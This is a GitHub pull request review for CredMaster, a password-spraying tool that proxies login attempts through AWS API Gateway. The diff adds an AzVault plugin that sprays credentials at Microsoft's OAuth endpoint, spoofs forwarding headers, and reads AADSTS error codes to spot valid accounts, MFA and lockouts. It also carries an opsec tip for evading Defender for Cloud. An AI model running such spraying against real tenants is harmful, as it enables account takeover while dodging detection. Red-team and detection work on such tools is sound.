### PR TITLE
Added in a few fixes, tidied up code base and begun work on additional modules and functionality

### PR DESCRIPTION
**Pull request by ZephrFish**

### CODE REVIEW

File: README.md [hunk 1]
```diff
@@ -14,7 +14,7 @@ For detection tips, see the blogpost and detection section.
 1. git clone the repo down
 2. If unsure how to create correct keys see this [blog](https://bond-o.medium.com/aws-pass-through-proxy-84f1f7fa4b4b).
 3. `pip install -r requirements.txt`
-4. [Optional] Add your slack webhook URL into config-vars.json if you want to use a webhook for when credentials are successfully guessed! (thanks to Ian for the function for notifications)
+4. [Optional] Add your slack webhook URL into config-vars.json if you want to use a webhook for when credentials are successfully guessed!
```
Comment (knavesec) [inline README.md:17]: Remove this line, Notification settings will be passed via CLI (for the time being). Will be making excessive changes to the CLI input process to make this easier

File: README.md [hunk 2]
```diff
@@ -38,21 +38,32 @@ For detection tips, see the blogpost and detection section.
...
 * [MSOL](https://github.com/knavesec/CredMaster/wiki/MSOL) - Microsoft Online
+  * `--plugin msol`
 * [Okta](https://github.com/knavesec/CredMaster/wiki/Okta) - Okta Authentication Portal
+  * `--plugin okta`
 * [FortinetVPN](https://github.com/knavesec/CredMaster/wiki/FortinetVPN) - Fortinet VPN Client
+  * `--plugin fortinetvpn`
 * [HTTPBrute](https://github.com/knavesec/CredMaster/wiki/HTTPBrute) - Generic HTTP Brute Methods (Basic/Digest/NTLM)
-* [ADFS](https://github.com/knavesec/CredMaster/wiki/ADFS) - Active Directory Federation Services
+  * `--plugin httpbrute`
+* [GMailEnum](https://github.com/knavesec/CredMaster/wiki/) - GSuite/Gmail enumeration
```
Comment (knavesec) [inline README.md:63]: Add GmailEnum to the link, small typo

**Review by knavesec — CHANGES_REQUESTED** [review]
Overall looks good, few small changes requested

**Review by ZephrFish — COMMENTED** [review]
Added in requested changes, updated documentation. 

New:
Added AzVault module for spraying
Added MS_Template for creating microsoft/azure specific spraying modules

Updated:
Unified config file so that webhook and aws config in same file, updated utils. credmaster and modules to accommodate.
Added in more details of the change log, work in progress and todo to add transparency to tooling dev.

WIP:
Began work on rewrite of config file to factor in other webhooks
Began research into GCP/Azure alternatives for API gateway and increased opsec

File: README.md [hunk 3]
```diff
@@ -14,16 +14,20 @@ For detection tips, see the blogpost and detection section.
 1. git clone the repo down
 2. If unsure how to create correct keys see this [blog](https://bond-o.medium.com/aws-pass-through-proxy-84f1f7fa4b4b).
 3. `pip install -r requirements.txt`
-4. [Optional] Add your slack webhook URL into config-vars.json if you want to use a webhook for when credentials are successfully guessed! (thanks to Ian for the function for notifications)
+4. [Optional] Add in config file as a parameter, containing info of AWS keys, webhooks and other content, template is shown below:
```
Comment (knavesec) [inline README.md:17]: Revert, I added changes to this line with documentation

File: README.md [hunk 4]
```diff
@@ -14,16 +14,20 @@ For detection tips, see the blogpost and detection section.
...
 
 ```
 {
-	"slack_webhook":"YOURURLHERE"
+	"slack_webhook":"YOURURLHERE",
```
Comment (knavesec) [inline README.md:21]: Remove this section, included a format config file section

File: README.md [hunk 5]
```diff
@@ -38,49 +42,74 @@ For detection tips, see the blogpost and detection section.
...
-Example Use:
+### Example Use:
 ```
 python3 credmaster.py --plugin {pluginname} --access_key {key} --secret_access_key {key} -u userfile -p passwordfile -a useragentfile {otherargs}
 ```
 
+or load in config file:
+
+```
+python3 credmaster.py --plugin {pluginname} --config config-vars.json -u userfile -p passwordfile -a useragentfile {otherargs}
```
Comment (knavesec) [inline README.md:82]: Modify to just python3 credmaster.py --config config.json

Comment (knavesec) [reply README.md:82]: Since everything can be specified via config file

File: README.md [hunk 6]
```diff
@@ -38,49 +42,74 @@ For detection tips, see the blogpost and detection section.
...
-* Stop on success flag
+* Stop on 'success' flag
 * Spray profile overhaul
 * Config file overhaul
-* Development notes
+* Development notes (Changelog added at bottom, but more documentation on the way!)
+
+## Work In Progress
+
+* Rewrite of CLI argument handling in favour of config files
```
Comment (knavesec) [inline README.md:106]: Remove since finished

File: config-vars.json [hunk 7]
```diff
@@ -1,3 +1,8 @@
 {
-	"slack_webhook":"YOURURLHERE"
+	"slack_webhook":"YOURURLHERE",
```
Comment (knavesec) [inline config-vars.json:2]: Remove file, created config.json file with requisite information

File: credmaster.py [hunk 8]
```diff
@@ -3,6 +3,7 @@
 import threading, queue, argparse, datetime, json, importlib, random, os, time
 from fire import FireProx
 import utils.utils as utils
+from utils.json_helper import read_json
```
Comment (knavesec) [inline credmaster.py:6]: remove, not necessary

File: credmaster.py [hunk 9]
```diff
@@ -58,14 +59,18 @@ def main(args,pargs):
 	# AWS Key parsing & Handling
 	if args.config != None:
 		log_entry("Loading AWS configuration details from file: {}".format(args.config))
-		aws_dict = json.loads(open(args.config).read())
-		access_key = aws_dict['access_key']
-		secret_access_key = aws_dict['secret_access_key']
-		profile_name = aws_dict['profile_name']
-		session_token = aws_dict['session_token']
+		config_dict = read_json(args.config)
```
Comment (knavesec) [inline credmaster.py:62]: Removed this whole section, key parsing handled in new function

File: credmaster.py [hunk 10]
```diff
@@ -58,14 +59,18 @@ def main(args,pargs):
...
+		access_key = config_dict['access_key']
+		secret_access_key = config_dict['secret_access_key']
+		profile_name = config_dict['profile_name']
+		session_token = config_dict['session_token']
+		webhook_url = config_dict['slack_webhook'] or config_dict['discord_webhook']
 	if access_key is None and secret_access_key is None and session_token is None and profile_name is None:
 		log_entry("No FireProx access arguments settings configured, add access keys/session token or fill out config file")
 		return
+	if webhook_url is None:
```
Comment (knavesec) [inline credmaster.py:71]: Remove, people may not want to specify a webhook for notifications

File: credmaster.py [hunk 11]
```diff
@@ -560,7 +565,7 @@ def log_entry(entry):
 	fp_args.add_argument('--access_key', type=str, default=None, help='AWS Access Key')
 	fp_args.add_argument('--secret_access_key', type=str, default=None, help='AWS Secret Access Key')
 	fp_args.add_argument('--session_token', type=str, default=None, help='AWS Session Token')
-	fp_args.add_argument('--config', type=str, default=None, help='Authenticate to AWS using config file aws.config')
+	fp_args.add_argument('--config', type=str, default=None, help='Authenticate to AWS and add in webhooks too plus other config if wanted')
```
Comment (knavesec) [inline credmaster.py:568]: Change to just say something like "config file for all configuration options" or something similar

File: plugins/azvault/azvault.py [hunk 12]
```diff
@@ -0,0 +1,120 @@
+import datetime, requests
```
Comment (knavesec) [inline plugins/azvault/azvault.py:1]: Remove datetime, not necessary

File: plugins/azvault/azvault.py [hunk 13]
```diff
@@ -0,0 +1,120 @@
...
+import utils.utils as utils
+
+def azvault_authenticate(url, username, password,  useragent, pluginargs):
+
+    ts = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
```
Comment (knavesec) [inline plugins/azvault/azvault.py:6]: remove, unused

File: plugins/azvault/azvault.py [hunk 14]
```diff
@@ -0,0 +1,120 @@
...
+
+    data_response = {
```
Comment (knavesec) [inline plugins/azvault/azvault.py:8]: Edit this to just include used sections, see examples in current plugin updates

File: plugins/azvault/azvault.py [hunk 15]
```diff
@@ -0,0 +1,120 @@
...
+
+    spoofed_ip = utils.generate_ip()
+    amazon_id = utils.generate_id()
+    trace_id = utils.generate_trace_id()
+
+    headers = {
+        "X-My-X-Forwarded-For" : spoofed_ip,
+        "x-amzn-apigateway-api-id" : amazon_id,
+        "X-My-X-Amzn-Trace-Id" : trace_id,
+        # Opsec tip: UA must be edge otherwise Defender for cloud will flag it!
```
Comment (knavesec) [inline plugins/azvault/azvault.py:45]: Good note, does this apply to all MS spraying functions? May be good to implement elsewhere?

File: plugins/azvault/azvault.py [hunk 16]
```diff
@@ -0,0 +1,120 @@
...
+
+        'Accept': 'application/json',
+        'Content-Type': 'application/x-www-form-urlencoded'
+    }
+
+    headers = utils.add_custom_headers(pluginargs, headers)
+
+    try:
+        resp = requests.post("{}/common/oauth2/token".format(url), headers=headers, data=body)
+        data_response['code'] = resp.status_code
```
Comment (knavesec) [inline plugins/azvault/azvault.py:56]: remove, unused

File: plugins/azvault/azvault.py [hunk 17]
```diff
@@ -0,0 +1,120 @@
...
+
+        if resp.status_code == 200:
+            data_response['success'] = True
```
Comment (knavesec) [inline plugins/azvault/azvault.py:59]: change to current plugin style.
data_response['result'] = "success" is the new return (both "result" dict key, and "success" as a string)
Remove coloration from output response, that will be handled outside of plugins themselves

Comment (knavesec) [reply plugins/azvault/azvault.py:59]: Remove slack notify functions as well, that will be handled outside of plugin

Comment (knavesec) [reply plugins/azvault/azvault.py:59]: Apply these to all the responses below

File: plugins/azvault/azvault.py [hunk 18]
```diff
@@ -0,0 +1,120 @@
...
+                data_response['success'] = False
+                data_response['output'] = utils.prRed(f"FAILED. {resp.status_code} Tenant for account {username} is not using AzureAD/Office365")
+
+            elif "AADSTS50034" in error:
+                data_response['success'] = False
+                data_response['output'] = utils.prRed(f'FAILED. {resp.status_code} Tenant for account {username} is not using AzureAD/Office365')
+
+            elif "AADSTS50079" in error or "AADSTS50076" in error:
+                # Microsoft MFA response
+                data_response['2fa_enabled'] = True
```
Comment (knavesec) [inline plugins/azvault/azvault.py:81]: remove, unused

File: plugins/azvault/azvault.py [hunk 19]
```diff
@@ -0,0 +1,120 @@
...
+                data_response['success'] = True
+                data_response['code'] = "2FA Microsoft"
```
Comment (knavesec) [inline plugins/azvault/azvault.py:83]: remove, unused

File: plugins/azvault/azvault.py [hunk 20]
```diff
@@ -0,0 +1,120 @@
...
+                data_response['output'] = utils.prYellow(f"SUCCESS! {resp.status_code} {username}:{password} - NOTE: The response indicates MFA (Microsoft) is in use.")
+                utils.slacknotify(username, password  + "\nInfo: MFA (Microsoft) is in use.")
+
+
+            elif "AADSTS50158" in error:
+                # Conditional Access response (Based off of limited testing this seems to be the response to DUO MFA)
+                data_response['2fa_enabled'] = True
```
Comment (knavesec) [inline plugins/azvault/azvault.py:90]: remove unused

File: plugins/azvault/azvault.py [hunk 21]
```diff
@@ -0,0 +1,120 @@
...
+                data_response['success'] = True
+                data_response['code'] = "2FA Other"
```
Comment (knavesec) [inline plugins/azvault/azvault.py:92]: remove unused

File: plugins/azvault/azvault.py [hunk 22]
```diff
@@ -0,0 +1,120 @@
...
+
+            elif "AADSTS50053" in error:
+                # Locked out account or Smart Lockout in place
+                data_response['success'] = False
+                data_response['output'] = utils.prYellow(f"WARNING! {resp.status_code} The account {username} appears to be locked.")
+
+
+            elif "AADSTS50055" in error:
+                # User password is expired
+                data_response['change'] = True
```
Comment (knavesec) [inline plugins/azvault/azvault.py:105]: remove unused

File: plugins/template/MS_Template/template.py [hunk 23]
```diff
@@ -0,0 +1,120 @@
+import datetime, requests
```
Comment (knavesec) [inline plugins/template/MS_Template/template.py:1]: All comments from previous template apply here

Curious if we could make this ultra generic, where you just specify the resource? Picking from vault.azure.net, graph.microsoft.net, etc so there doesn't need to be templates for each

File: utils/utils.py [hunk 24]
```diff
@@ -6,7 +6,7 @@
 
 # We can set anything up here for easy parsing and access later, for the moment this only houses the slack webhook, can probably add discord and other platforms at a later date as parsing isn't an issue.
 
-configvars = read_json("config-vars")
+config_dict = read_json("config-vars")
```
Comment (knavesec) [inline utils/utils.py:9]: Accept changes to current notify function, separated in new file

**Review by knavesec — CHANGES_REQUESTED** [review]
Looking really good, unfortunately I made some changes the same time you did that conflict. See the comments, all content looks good

**Comment by knavesec** [comment]
Closed for repull due to side conversation

**Pull request closed without merging**